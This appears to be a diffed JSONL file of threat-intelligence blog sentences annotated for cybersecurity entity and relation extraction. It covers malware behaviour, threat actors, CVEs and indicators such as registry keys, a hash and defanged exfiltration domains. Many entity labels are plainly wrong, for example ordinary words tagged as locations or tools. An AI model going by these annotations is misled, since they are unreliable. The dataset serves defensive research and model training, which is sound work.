up.","entities":[{"id":30935,"label":"location","start_offset":7,"end_offset":11},{"id":30936,"label":"location","start_offset":37,"end_offset":43},{"id":30937,"label":"TIME","start_offset":51,"end_offset":60},{"id":30938,"label":"attack-pattern","start_offset":90,"end_offset":98}],"relations":[],"Comments":[]} +{"id":14039,"text":"Figure 4 shows the leaked path.","entities":[],"relations":[],"Comments":[]} +{"id":4392,"text":"When launched, the tool makes an HTTP GET request to a C2 to check for a response body of \"OK'' and will terminate if it's not found.","entities":[],"relations":[],"Comments":[]} +{"id":3961,"text":" Security recommendations","entities":[],"relations":[],"Comments":[]} +{"id":429,"text":" When this is done with the visitor\u2019s full knowledge and consent, it\u2019s a fair and reasonable exchange.","entities":[],"relations":[],"Comments":[]} +{"id":11017,"text":"Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including \u201cguest\u201d posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers.","entities":[{"id":33593,"label":"threat-actor","start_offset":26,"end_offset":29},{"id":33594,"label":"location","start_offset":30,"end_offset":33},{"id":33595,"label":"location","start_offset":147,"end_offset":155},{"id":33596,"label":"location","start_offset":169,"end_offset":175},{"id":33597,"label":"location","start_offset":233,"end_offset":241}],"relations":[],"Comments":[]} +{"id":1086,"text":"But before we get into the details, here is a quick overview of mutexes and why they exist in the first place.","entities":[],"relations":[],"Comments":[]} +{"id":4282,"text":"Figure 12.","entities":[],"relations":[],"Comments":[]} +{"id":1204,"text":"According to Wanyx\u2019s website, 12 of the 50 games in Wanyx\u2019s suggested games column contain the discussed IAP SDKs.","entities":[{"id":46596,"label":"identity","start_offset":13,"end_offset":18},{"id":46597,"label":"identity","start_offset":52,"end_offset":58}],"relations":[],"Comments":[]} +{"id":7636,"text":"The TA505 group usually attaches a malicious file without any compression.","entities":[],"relations":[],"Comments":[]} +{"id":4743,"text":"This industry appears to be thriving.","entities":[],"relations":[],"Comments":[]} +{"id":2427,"text":"Early in 2010, CVE-2010-1622 was assigned to a remote code execution vulnerability in the Spring Framework.","entities":[{"id":45513,"label":"vulnerability","start_offset":15,"end_offset":28},{"id":45514,"label":"SOFTWARE","start_offset":90,"end_offset":106},{"id":45515,"label":"attack-pattern","start_offset":47,"end_offset":68},{"id":45512,"label":"TIME","start_offset":0,"end_offset":13}],"relations":[{"id":106,"from_id":45514,"to_id":45513,"type":"has"},{"id":107,"from_id":45515,"to_id":45513,"type":"uses"}],"Comments":[]} +{"id":247,"text":"Once a user opens the website in the browser, it starts making requests to various Ukrainian news sites and lists the number of requests made to each new site on the home page, as shown in Figure 12 below.","entities":[{"id":45945,"label":"identity","start_offset":83,"end_offset":103}],"relations":[],"Comments":[]} +{"id":6810,"text":" hxxp:\/\/{FQDN}\/{computer name}_{hexadecimal volume serial number}\/help_{day}_{month}[.]php Conclusion Gameradon is not the first group to take advantage of the Covid-19 topic.","entities":[],"relations":[],"Comments":[]} +{"id":7432,"text":"Because of these policies, experienced actor groups like Pawn Storm can take advantage of OAuth for their credential phishing schemes.","entities":[{"id":23115,"label":"location","start_offset":68,"end_offset":71},{"id":23116,"label":"attack-pattern","start_offset":117,"end_offset":125}],"relations":[],"Comments":[]} +{"id":14075,"text":"However, our analysis shows further similarities that imply correlation.","entities":[],"relations":[],"Comments":[]} +{"id":1845,"text":"DeviceIoControl as an argument with the current process ID ","entities":[],"relations":[],"Comments":[]} +{"id":9,"text":" Palo Alto Networks Enterprise Security Platform offers multilayer protection to prevent this attack along with other attacks without the need for prior knowledge of the specific attack.","entities":[{"id":31,"label":"identity","start_offset":1,"end_offset":19}],"relations":[],"Comments":[]} +{"id":6490,"text":"Using a UPX unpacker, we were able to extract the contents, which consists of a Python executable.","entities":[],"relations":[],"Comments":[]} +{"id":4664,"text":"The language is returned to its original setting when the run is finished.","entities":[],"relations":[],"Comments":[]} +{"id":6403,"text":"Expanding our research beyond the two samples discussed above, we have also identified an additional seven samples of BRc4 dating back to February 2021.","entities":[{"id":19870,"label":"tools","start_offset":118,"end_offset":122}],"relations":[],"Comments":[]} +{"id":14230,"text":"The beginning and end markers, DZKS and DZJS, are typical in PlugX. A closer look, however, shows that the decryption algorithm is different from PlugX.","entities":[{"id":48416,"label":"malware","start_offset":146,"end_offset":151},{"id":48415,"label":"malware","start_offset":61,"end_offset":66}],"relations":[],"Comments":[]} +{"id":9839,"text":"First stage: Information collection 2.","entities":[],"relations":[],"Comments":[]} {"id":7892,"text":"But when April 2017 came, Rig started a very marked decline.","entities":[],"relations":[],"Comments":[]} -{"id":7904,"text":"As shown below, the volume of coinmining increase nearly 2,800% in a year.","entities":[],"relations":[],"Comments":[]} -{"id":7908,"text":"We can’t say why this shift is happening.","entities":[],"relations":[],"Comments":[]} -{"id":7909,"text":"It could be there is a shift from ransomware due to a declining return on investment because people no longer willing to pay ransom in the wake of WannaCry\/ WanaCrypt0r, and Petya\/NotPetya.","entities":[{"id":24502,"label":"location","start_offset":125,"end_offset":131},{"id":24503,"label":"location","start_offset":139,"end_offset":143},{"id":24504,"label":"malware","start_offset":157,"end_offset":168},{"id":24505,"label":"location","start_offset":170,"end_offset":173},{"id":24506,"label":"malware","start_offset":174,"end_offset":179},{"id":24507,"label":"malware","start_offset":180,"end_offset":188}],"relations":[],"Comments":[]} -{"id":7916,"text":"This post is also available in: 日本語 (Japanese) As part of Palo Alto Networks Unit 42’s ongoing monitoring of the Shamoon 2 situation, we have updated information since our last posting Threat Brief: Second Wave of Shamoon 2 Attacks Reveal Possible New Tactic.","entities":[{"id":24524,"label":"location","start_offset":5,"end_offset":9},{"id":24527,"label":"tools","start_offset":119,"end_offset":126},{"id":24530,"label":"malware","start_offset":220,"end_offset":227}],"relations":[],"Comments":[]} -{"id":7917,"text":"Since that Threat Brief, our Unit 42 researchers have become aware of another wave of Shamoon 2 attacks.","entities":[{"id":24532,"label":"tools","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} -{"id":7918,"text":"This third wave was set to wipe systems using the Disttrack malware on January 23, 2017.","entities":[],"relations":[],"Comments":[]} -{"id":7933,"text":"In order to understand how this works, let’s first take a look at how Android installs apps.","entities":[],"relations":[],"Comments":[]} -{"id":7934,"text":"Android supports the ability to install apps from the Google Play store as well as from the local file system.","entities":[],"relations":[],"Comments":[]} -{"id":7935,"text":"Google Play downloads Android packages (APKs) to a protected space of the file system.","entities":[],"relations":[],"Comments":[]} +{"id":3913,"text":"Microsoft issued a patch for this vulnerability in February 2020.","entities":[{"id":49768,"label":"TIME","start_offset":52,"end_offset":65},{"id":49767,"label":"identity","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} +{"id":3550,"text":"In November 2019, we published a blog analyzing an exploit kit we named Capesand that exploited Adobe Flash and Microsoft Internet Explorer flaws.","entities":[{"id":49331,"label":"TIME","start_offset":3,"end_offset":16},{"id":49332,"label":"malware","start_offset":72,"end_offset":80},{"id":49333,"label":"SOFTWARE","start_offset":96,"end_offset":107},{"id":49334,"label":"SOFTWARE","start_offset":112,"end_offset":139}],"relations":[{"id":784,"from_id":49332,"to_id":49333,"type":"exploits"},{"id":785,"from_id":49332,"to_id":49334,"type":"exploits"}],"Comments":[]} +{"id":13146,"text":"Tropic Trooper, a threat actor group that targets government, military, healthcare, transportation, and high-tech industries in Taiwan, the Philippines, and Hong Kong, has been active since 2011.","entities":[{"id":48920,"label":"identity","start_offset":104,"end_offset":124},{"id":48922,"label":"location","start_offset":140,"end_offset":151},{"id":48924,"label":"TIME","start_offset":184,"end_offset":194},{"id":48916,"label":"identity","start_offset":50,"end_offset":60},{"id":48921,"label":"location","start_offset":128,"end_offset":134},{"id":48915,"label":"threat-actor","start_offset":0,"end_offset":14},{"id":48917,"label":"identity","start_offset":62,"end_offset":70},{"id":48918,"label":"identity","start_offset":72,"end_offset":82},{"id":48919,"label":"identity","start_offset":84,"end_offset":98},{"id":48923,"label":"location","start_offset":157,"end_offset":166}],"relations":[{"id":491,"from_id":48920,"to_id":48921,"type":"located-at"},{"id":492,"from_id":48916,"to_id":48921,"type":"located-at"},{"id":487,"from_id":48915,"to_id":48917,"type":"targets"},{"id":488,"from_id":48915,"to_id":48918,"type":"targets"},{"id":489,"from_id":48915,"to_id":48919,"type":"targets"},{"id":494,"from_id":48916,"to_id":48922,"type":"located-at"},{"id":495,"from_id":48916,"to_id":48923,"type":"located-at"},{"id":496,"from_id":48917,"to_id":48921,"type":"located-at"},{"id":497,"from_id":48915,"to_id":48916,"type":"targets"},{"id":498,"from_id":48915,"to_id":48924,"type":"related-to"},{"id":493,"from_id":48918,"to_id":48922,"type":"targets"}],"Comments":[]} +{"id":3238,"text":" A second HTTP server will also be created to listen on one of the aforementioned port numbers.","entities":[],"relations":[],"Comments":[]} +{"id":1597,"text":"The first version of Funtasy we detected is a fake television remote control application.","entities":[{"id":46844,"label":"malware","start_offset":21,"end_offset":28}],"relations":[],"Comments":[]} +{"id":830,"text":" Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available. CVE-2020-0601: The ChainOfFools\/CurveBall Attack Explained POC Win10 Crypto Vulnerability: Cheating in Elliptic Curve Billiards 2 NSA Cybersecurity Advisory Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":46383,"label":"identity","start_offset":250,"end_offset":253},{"id":46384,"label":"vulnerability","start_offset":137,"end_offset":149},{"id":46381,"label":"vulnerability","start_offset":118,"end_offset":131},{"id":46382,"label":"SOFTWARE","start_offset":182,"end_offset":187},{"id":46380,"label":"identity","start_offset":1,"end_offset":19},{"id":46385,"label":"vulnerability","start_offset":150,"end_offset":159}],"relations":[],"Comments":[]} +{"id":8602,"text":"Code signatures on Windows executables provide guarantees about the integrity of a signed executable, as well as information about the identity of the signer.","entities":[],"relations":[],"Comments":[]} +{"id":12303,"text":"We terminated 22 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Indonesia.","entities":[],"relations":[],"Comments":[]} +{"id":13063,"text":"The Malware that Usually Installs Ransomware and You Need to Remove Right Away","entities":[],"relations":[],"Comments":[]} +{"id":652,"text":"In reality, the malware is encrypting the NTFS Master File Table in the background.","entities":[],"relations":[],"Comments":[]} +{"id":9705,"text":"The highlighted bytes represent the scrambled computer info Figure 22.","entities":[],"relations":[],"Comments":[]} +{"id":488,"text":" How it Works ","entities":[],"relations":[],"Comments":[]} +{"id":11726,"text":" ED5E1D6E914DE64A203F2F32AB95176FC7EFFF3A520915971D5FE748E79D611C","entities":[{"id":36131,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} +{"id":3502,"text":"Based on the controller\u2019s behavior, we can posit that both Marade and Protux were authored by the same threat actors.","entities":[{"id":49298,"label":"malware","start_offset":70,"end_offset":76},{"id":49297,"label":"malware","start_offset":59,"end_offset":65}],"relations":[{"id":780,"from_id":49297,"to_id":49298,"type":"variant-of"}],"Comments":[]} +{"id":6944,"text":" Figure 7.","entities":[],"relations":[],"Comments":[]} +{"id":8994,"text":"However, as the rshell sample was found in 2021, we initially did not find this correlation strong enough to attribute the rshellmalware family to Iron Tiger.","entities":[{"id":27790,"label":"location","start_offset":23,"end_offset":29},{"id":27792,"label":"location","start_offset":92,"end_offset":98},{"id":27793,"label":"threat-actor","start_offset":147,"end_offset":157}],"relations":[],"Comments":[]} +{"id":2122,"text":"A successful attack would run code in the security context that Struts is using.","entities":[{"id":47261,"label":"SOFTWARE","start_offset":64,"end_offset":70}],"relations":[],"Comments":[]} +{"id":1253,"text":"[1] These attacks took place between January and March of 2015.","entities":[{"id":46630,"label":"TIME","start_offset":37,"end_offset":62}],"relations":[],"Comments":[]} +{"id":4104,"text":"Encrypted configuration file ","entities":[],"relations":[],"Comments":[]} +{"id":9487,"text":"Another malware family that we obtained both Windows and macOS samples of during our investigation was oRAT.","entities":[{"id":29125,"label":"location","start_offset":53,"end_offset":56},{"id":29126,"label":"malware","start_offset":103,"end_offset":107}],"relations":[],"Comments":[]} +{"id":11121,"text":"In previous posts, we discussed targeting of health organizations as well as attacker efforts to impersonate the World Health Organization.","entities":[],"relations":[],"Comments":[]} +{"id":5860,"text":"Such as the term mercenary, right?","entities":[],"relations":[],"Comments":[]} +{"id":6661,"text":"This post is also available in: \u65e5\u672c\u8a9e (Japanese) Palo Alto Networks Unit 42 threat intelligence team has just released new research that has uncovered a previously unknown second wave of Shamoon 2 attacks: Second Wave of Shamoon 2 Attacks Identified Based on our analysis, these attacks were timed to occur on November 29, 2016, twelve days after the initial Shamoon 2 attacks that we wrote about previously. ","entities":[{"id":20662,"label":"location","start_offset":5,"end_offset":9},{"id":20664,"label":"identity","start_offset":53,"end_offset":71},{"id":20665,"label":"identity","start_offset":72,"end_offset":79},{"id":20666,"label":"identity","start_offset":109,"end_offset":113},{"id":20668,"label":"tools","start_offset":191,"end_offset":198},{"id":20669,"label":"malware","start_offset":225,"end_offset":232},{"id":20672,"label":"tools","start_offset":364,"end_offset":371}],"relations":[],"Comments":[]} +{"id":471,"text":"But it is an important piece that enables modern malware to try and evade security products and countermeasures.","entities":[],"relations":[],"Comments":[]} +{"id":11039,"text":"Host IOCs Registry Keys HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\KernelConfig HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DriverConfig HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SSL Update File Paths C:\\Windows\\System32\\Nwsapagent.sys C:\\Windows\\System32\\helpsvc.sys C:\\ProgramData\\USOShared\\uso.bin C:\\ProgramData\\VMware\\vmnat-update.bin C:\\ProgramData\\VirtualBox\\update.bin","entities":[{"id":33653,"label":"location","start_offset":0,"end_offset":4},{"id":33654,"label":"REGISTRYKEY","start_offset":24,"end_offset":83},{"id":33655,"label":"REGISTRYKEY","start_offset":84,"end_offset":143},{"id":33656,"label":"REGISTRYKEY","start_offset":144,"end_offset":198}],"relations":[],"Comments":[]} +{"id":1359,"text":"Using our PoC, we created the following demonstration video of how a malicious actor would exploit the CVE-2021-32648 vulnerability, log into the compromised OctoberCMS account and to deface a web page hosted by the server:","entities":[{"id":44975,"label":"vulnerability","start_offset":103,"end_offset":117},{"id":44976,"label":"SOFTWARE","start_offset":158,"end_offset":168}],"relations":[{"id":49,"from_id":44976,"to_id":44975,"type":"has"}],"Comments":[]} +{"id":4370,"text":" URLs\/Domains\/IP Addresses Server hosting malicious documents parinari[.]xyz Server used for file exfiltration pirnaram[.]xyz Domain names linked to other campaigns","entities":[{"id":50157,"label":"DOMAIN","start_offset":73,"end_offset":87},{"id":50158,"label":"DOMAIN","start_offset":124,"end_offset":138}],"relations":[],"Comments":[]} +{"id":1824,"text":"It installs the driver file in preparation for disabling the running antivirus product.","entities":[],"relations":[],"Comments":[]} +{"id":13711,"text":"It uses Writing Style DNA to detect BEC impersonations and computer vision to find credential-stealing phishing sites.","entities":[{"id":51759,"label":"attack-pattern","start_offset":103,"end_offset":111},{"id":51758,"label":"attack-pattern","start_offset":83,"end_offset":102}],"relations":[],"Comments":[]} +{"id":10499,"text":"We look forward to continuing our work in this space and advancing the safety and security of our users around the world.","entities":[{"id":31920,"label":"location","start_offset":53,"end_offset":56},{"id":31921,"label":"tools","start_offset":71,"end_offset":77},{"id":31922,"label":"location","start_offset":78,"end_offset":81},{"id":31923,"label":"location","start_offset":82,"end_offset":90},{"id":31924,"label":"location","start_offset":115,"end_offset":120}],"relations":[],"Comments":[]} +{"id":11249,"text":"We\u2019ll also continue to apply those findings internally to improve the safety and security of our products so we can effectively combat threats and protect users who rely on our services.","entities":[{"id":34385,"label":"tools","start_offset":70,"end_offset":76},{"id":34386,"label":"location","start_offset":77,"end_offset":80},{"id":34387,"label":"location","start_offset":81,"end_offset":89},{"id":34388,"label":"location","start_offset":112,"end_offset":115},{"id":34389,"label":"location","start_offset":143,"end_offset":146}],"relations":[],"Comments":[]} +{"id":2910,"text":"Additionally, each sample uses a Sound object named \u2018snd\u2019 to gain control, and they all invoke the function toString(). ","entities":[],"relations":[],"Comments":[]} +{"id":563,"text":"Based on the way Virlock spreads the ransom amount it demands, it is likely designed to target consumers or home users.","entities":[{"id":46173,"label":"malware","start_offset":17,"end_offset":24}],"relations":[],"Comments":[]} +{"id":3207,"text":"After the hex decoding of the arguments, we get a Python one-liner that downloads additional Python scripts from the cloud.","entities":[{"id":48335,"label":"SOFTWARE","start_offset":50,"end_offset":56},{"id":48336,"label":"SOFTWARE","start_offset":93,"end_offset":100}],"relations":[],"Comments":[]} +{"id":14214,"text":"It copies itself on %WINDIR%\\system32\\wbem\\ and replaces the original DLL.","entities":[{"id":48240,"label":"FILEPATH","start_offset":20,"end_offset":43}],"relations":[],"Comments":[]} +{"id":13679,"text":"The originating IP of Water Nue\u2019s test\/deployment machine was left in a clear text file in the phishing site\u2019s server for collected credentials.","entities":[{"id":51751,"label":"campaign","start_offset":22,"end_offset":33},{"id":42553,"label":"attack-pattern","start_offset":95,"end_offset":103}],"relations":[],"Comments":[]} +{"id":2497,"text":"Cortex XDR Pro customers also have visibility into post-exploitation activities and can specifically track the \u201cProcess execution with a suspicious command line indicative of the Spring4Shell exploit\u201d and \u201cSuspicious HTTP Request to a vulnerable Java class\u201d Analytics BIOCs.","entities":[{"id":47598,"label":"vulnerability","start_offset":206,"end_offset":256},{"id":47599,"label":"vulnerability","start_offset":112,"end_offset":199},{"id":47594,"label":"SOFTWARE","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} +{"id":11593,"text":"The configuration is encoded with a 105-byte XOR key.","entities":[],"relations":[],"Comments":[]} +{"id":10754,"text":"Additionally, we also found that the steganography algorithm (alternative base64 + RC4) between XXMM and Daserf were the same.","entities":[{"id":32862,"label":"location","start_offset":88,"end_offset":95},{"id":32863,"label":"malware","start_offset":96,"end_offset":100},{"id":32864,"label":"location","start_offset":101,"end_offset":104},{"id":32866,"label":"location","start_offset":121,"end_offset":125}],"relations":[],"Comments":[]} +{"id":2345,"text":"Having a loader and a payload ready, we set out to test the exploit on a fresh install of Catalina (10.15) since it was the version in which we were served the full exploit chain.","entities":[{"id":47400,"label":"SOFTWARE","start_offset":90,"end_offset":106}],"relations":[],"Comments":[]} +{"id":14221,"text":"When it is loaded by the system, DLLMain decrypts the payload via CryptUnprotectData.","entities":[{"id":48251,"label":"tools","start_offset":66,"end_offset":84},{"id":48252,"label":"malware","start_offset":33,"end_offset":41}],"relations":[{"id":395,"from_id":48252,"to_id":48251,"type":"uses"}],"Comments":[]} +{"id":10313,"text":".Win32.TRX.XXPE50FFF039","entities":[],"relations":[],"Comments":[]} +{"id":4871,"text":"The attacker would then use a custom tool to download the mailbox contents via IMAP.","entities":[],"relations":[],"Comments":[]} +{"id":2695,"text":"Palo Alto Networks detects and prevents LockBit 2.0 ransomware in the following ways:","entities":[{"id":47928,"label":"identity","start_offset":0,"end_offset":18},{"id":47929,"label":"threat-actor","start_offset":40,"end_offset":51}],"relations":[],"Comments":[]} +{"id":2797,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} +{"id":4271,"text":"The backdoors also linked to an infrastructure matching old Hangover domains as well as the infrastructure of domains from the September 2016 blog post.","entities":[{"id":50074,"label":"TIME","start_offset":127,"end_offset":141},{"id":50075,"label":"threat-actor","start_offset":60,"end_offset":68}],"relations":[],"Comments":[]} +{"id":101,"text":"In our first half report, we highlight an APT group named TeamTNT that has been targeting clouds for quite a while now.","entities":[{"id":45833,"label":"threat-actor","start_offset":58,"end_offset":65}],"relations":[],"Comments":[]} +{"id":2561,"text":"We do believe there is evidence suggestive of a connection between Shamoon 2 and the Magic Hound campaign, which could indicate these two attack campaigns could have worked in conjunction with each other to execute the Shamoon 2 attacks.","entities":[{"id":47761,"label":"campaign","start_offset":85,"end_offset":105},{"id":47760,"label":"campaign","start_offset":67,"end_offset":76},{"id":47762,"label":"campaign","start_offset":219,"end_offset":228}],"relations":[{"id":350,"from_id":47761,"to_id":47760,"type":"related-to"}],"Comments":[]} +{"id":2562,"text":" We also believe the presence of specific, valid named hosts from the network used in Stage 2 shows they were obtained directly from Active Directory on a domain controller.","entities":[{"id":47763,"label":"SOFTWARE","start_offset":133,"end_offset":149}],"relations":[],"Comments":[]} +{"id":11672,"text":" Figure 7.","entities":[],"relations":[],"Comments":[]} +{"id":4807,"text":"We believe there was no major impact on Android users and that the number of installs was miniscule.","entities":[{"id":50723,"label":"SOFTWARE","start_offset":40,"end_offset":47}],"relations":[],"Comments":[]} +{"id":3848,"text":"The third version we found (5.1.2 rc1) reverts to a DLL file type but retains the C&C server.","entities":[],"relations":[],"Comments":[]} +{"id":13993,"text":"However, by comparing key pieces of information with known sources, it is possible to determine when a campaign was likely perpetrated by a certain group.","entities":[],"relations":[],"Comments":[]} +{"id":8969,"text":"HyperBro","entities":[{"id":27710,"label":"malware","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} +{"id":13090,"text":" Why IIoT matters Industrial IoT (IIoT) systems are already streamlining production processes, improving cost efficiencies, and helping to drive greater agility and innovation for manufacturers.","entities":[],"relations":[],"Comments":[]} +{"id":2444,"text":" Once we deployed the Threat Prevention signatures, we analyzed the packet captures associated with our \"Spring Core Remote Code Execution Vulnerability\" signature and found that a majority of the activity was likely generated by variations of the publicly available PoC tools.","entities":[{"id":47512,"label":"vulnerability","start_offset":105,"end_offset":152}],"relations":[],"Comments":[]} +{"id":14238,"text":"It created one legitimate project\/repository (mobile-phone-project) in June 2016, derived from another generic GitHub page.","entities":[{"id":48429,"label":"SOFTWARE","start_offset":111,"end_offset":118},{"id":48430,"label":"TIME","start_offset":71,"end_offset":80}],"relations":[],"Comments":[]} +{"id":1025,"text":"Four hours later, we received confirmation that the custom email address \"claud@student.cnri.edu\" was active.","entities":[{"id":3215,"label":"TIME","start_offset":0,"end_offset":16},{"id":46516,"label":"EMAIL","start_offset":74,"end_offset":96}],"relations":[],"Comments":[]} +{"id":11991,"text":"We terminated 1 YouTube channel as part of our ongoing investigation into coordinated influence operations linked to Russia.","entities":[],"relations":[],"Comments":[]} +{"id":10751,"text":"REDBALDKNIGHT\u2019s tool can create, embed, and hide executables or configuration files within the image file with its tag and encrypted strings via steganography.","entities":[{"id":32855,"label":"threat-actor","start_offset":0,"end_offset":13},{"id":32856,"label":"location","start_offset":16,"end_offset":20},{"id":32857,"label":"location","start_offset":21,"end_offset":24},{"id":32858,"label":"location","start_offset":40,"end_offset":43},{"id":32859,"label":"location","start_offset":119,"end_offset":122}],"relations":[],"Comments":[]} +{"id":2008,"text":"In the first sample we encountered (Figure 3, left), the ransom note only linked to a TOX ID, whereas a later observed sample (Figure 3, right) links to an onion domain as well as a TOX ID (different from the one in the first version).","entities":[],"relations":[],"Comments":[]} +{"id":948,"text":"They provide an SDK and services to help developers display rich advertisements with a high pay rate.","entities":[],"relations":[],"Comments":[]} +{"id":527,"text":" Figure 4 breaks down which file types we saw in the course of ransomware detection and their prevalence.","entities":[],"relations":[],"Comments":[]} +{"id":2563,"text":"This is also suggestive of access to the network through legitimate, stolen credentials.","entities":[],"relations":[],"Comments":[]} +{"id":2525,"text":"Conti\u2019s methodology often follows the \u201cdouble extortion\u201d approach that many leading ransomware groups are presently using.","entities":[{"id":47722,"label":"threat-actor","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} +{"id":1411,"text":"Olivia Smith","entities":[{"id":46754,"label":"identity","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} +{"id":2362,"text":"Notable features for this backdoor include: Our team is constantly working to secure our users and keep them safe from targeted attacks like this one.","entities":[],"relations":[],"Comments":[]} +{"id":6466,"text":"This is a command to execute a PowerShell script of some kind.","entities":[{"id":20106,"label":"attack-pattern","start_offset":31,"end_offset":41}],"relations":[],"Comments":[]} +{"id":13055,"text":"Weaponizing Open Source Software for Targeted Attacks","entities":[],"relations":[],"Comments":[]} +{"id":561,"text":" Since Virlock only requests a $250 ransom, it does not draw too much public attention.","entities":[{"id":45795,"label":"malware","start_offset":7,"end_offset":14}],"relations":[],"Comments":[]} +{"id":1021,"text":"Figure 5: A seller advertising a customizable \u201cxxx.edu\u201d email account.","entities":[],"relations":[],"Comments":[]} +{"id":4090,"text":" Figure 7.","entities":[],"relations":[],"Comments":[]} +{"id":5328,"text":"To send data to the C&C server, the core component performs a TLS handshake with a randomly chosen C&C server at a random TCP port, both of which are from a hard-coded list.","entities":[],"relations":[],"Comments":[]} +{"id":2166,"text":" Microsoft has since released protection guidance and assigned CVE-2022-30190 to this vulnerability.","entities":[{"id":45406,"label":"identity","start_offset":1,"end_offset":10},{"id":45407,"label":"vulnerability","start_offset":63,"end_offset":77}],"relations":[],"Comments":[]} +{"id":12537,"text":"The landing page contained a simple HTML page loading two scripts\u2014one for Capstone.js and another for the exploit chain.","entities":[{"id":39015,"label":"location","start_offset":4,"end_offset":11},{"id":39016,"label":"tools","start_offset":12,"end_offset":16},{"id":39017,"label":"malware","start_offset":41,"end_offset":45},{"id":39019,"label":"location","start_offset":66,"end_offset":69},{"id":39020,"label":"location","start_offset":86,"end_offset":89}],"relations":[],"Comments":[]} +{"id":7328,"text":"Threat groups such as OceanLotus are actively updating malware variants in attempts to evade detection and improve persistence.","entities":[{"id":22805,"label":"threat-actor","start_offset":22,"end_offset":32},{"id":22806,"label":"location","start_offset":33,"end_offset":36},{"id":22807,"label":"location","start_offset":103,"end_offset":106}],"relations":[],"Comments":[]} +{"id":2265,"text":"It was last updated on May 12, 2022.","entities":[{"id":45432,"label":"TIME","start_offset":23,"end_offset":35}],"relations":[],"Comments":[]} +{"id":383,"text":"Assets running end-of-life software should never be internet-facing.","entities":[],"relations":[],"Comments":[]} +{"id":2224,"text":"It continues to dynamically load a number of libraries and functions for later use.","entities":[],"relations":[],"Comments":[]} +{"id":5299,"text":"It also enables non-blocking I\/O for the writing file descriptor by using ioctl().","entities":[],"relations":[],"Comments":[]} +{"id":13332,"text":"Just last May, Trend Micro connected the group to ransomware attacks on Taiwanese organizations.","entities":[],"relations":[],"Comments":[]} +{"id":10588,"text":"The exploits were delivered via compromised legitimate websites (e.g. watering hole attacks), links to malicious websites, and email attachments in limited spear phishing campaigns.","entities":[{"id":32300,"label":"location","start_offset":79,"end_offset":83},{"id":32301,"label":"location","start_offset":123,"end_offset":126},{"id":32302,"label":"attack-pattern","start_offset":156,"end_offset":170}],"relations":[],"Comments":[]} +{"id":880,"text":" Figure 2. Check by PClock2 for hooking of sleep function A simple check is performed to determine if the malware is running with administrative privileges.","entities":[{"id":46413,"label":"malware","start_offset":20,"end_offset":27},{"id":46414,"label":"attack-pattern","start_offset":32,"end_offset":39}],"relations":[],"Comments":[]} +{"id":12208,"text":"We terminated 123 YouTube channels as part of our investigation into coordinated influence operations linked to Russia.","entities":[],"relations":[],"Comments":[]} +{"id":1338,"text":" The malware proceeds to make an attempt at binding to the local host on port 1139.","entities":[],"relations":[],"Comments":[]} +{"id":10355,"text":"The PS function from which PRB-Backdoor takes its name","entities":[],"relations":[],"Comments":[]} +{"id":1349,"text":" Though both attacks have targeted Ukrainian organizations, the two threats have so far been implemented in separate situations.","entities":[{"id":46678,"label":"identity","start_offset":35,"end_offset":58}],"relations":[],"Comments":[]} +{"id":8574,"text":"Targets typically had to navigate through at least one redirect before landing on a phishing domain.","entities":[{"id":26499,"label":"location","start_offset":71,"end_offset":78},{"id":26500,"label":"attack-pattern","start_offset":84,"end_offset":92}],"relations":[],"Comments":[]} +{"id":13412,"text":"We haven\u2019t retrieved a copy of the exploit.","entities":[],"relations":[],"Comments":[]} +{"id":5533,"text":"Indeed, the Magecart attackers have proven over the past year that no website is safe from skimming attacks.","entities":[{"id":51531,"label":"malware","start_offset":12,"end_offset":20}],"relations":[],"Comments":[]} +{"id":4632,"text":"The oldest known sample is from 2020, and the tool is still under active development.","entities":[{"id":50551,"label":"TIME","start_offset":32,"end_offset":36}],"relations":[],"Comments":[]} +{"id":4836,"text":"They target a wide range of users and opportunistically take advantage of known security flaws when undertaking their campaigns.","entities":[],"relations":[],"Comments":[]} +{"id":6546,"text":"Based on the use of domain names they registered, the group started out in the business of fake\/rogue anti-virus products in 2007.","entities":[{"id":20294,"label":"malware","start_offset":96,"end_offset":101}],"relations":[],"Comments":[]} +{"id":10045,"text":"Another file, ps, is a Linux executable that serves as an SSH backdoor.","entities":[],"relations":[],"Comments":[]} +{"id":9588,"text":"HYPERSCRAPE then begins iterating through all available tabs in the inbox looking for emails to download.","entities":[],"relations":[],"Comments":[]} +{"id":14013,"text":"That action by itself potentially introduces other leads that developers may forget to clean.","entities":[],"relations":[],"Comments":[]} +{"id":461,"text":"Attackers developed DGA specifically to counter these actions.","entities":[],"relations":[],"Comments":[]} +{"id":3769,"text":" The content of this exploit file can be observed below.","entities":[],"relations":[],"Comments":[]} +{"id":432,"text":"While the user will experience a slow-down as the coin mining software is run, it is (or should be) expected, because of the notification, and so done with the site visitor\u2019s consent.","entities":[],"relations":[],"Comments":[]} +{"id":6442,"text":" Figure 1. Phishing Email with the embedded URL The email attempts to convince recipients to click the URL and download a malicious file.","entities":[{"id":20051,"label":"attack-pattern","start_offset":15,"end_offset":23},{"id":20052,"label":"location","start_offset":116,"end_offset":119}],"relations":[],"Comments":[]} +{"id":13938,"text":" In the Colonial Pipeline attack, DarkSide used double extortion.","entities":[{"id":48757,"label":"malware","start_offset":34,"end_offset":43}],"relations":[],"Comments":[]} +{"id":5495,"text":"A tangled web of malware","entities":[],"relations":[],"Comments":[]} +{"id":14093,"text":" Figure 11. Exfiltration command similarities. Code sharing","entities":[],"relations":[],"Comments":[]} +{"id":184,"text":"Over the past several weeks, Russia-Ukraine cyber activity has escalated substantially.","entities":[],"relations":[],"Comments":[]} +{"id":14070,"text":"We also found that older samples from the previous SLUB campaigns in 2019 used a similar naming 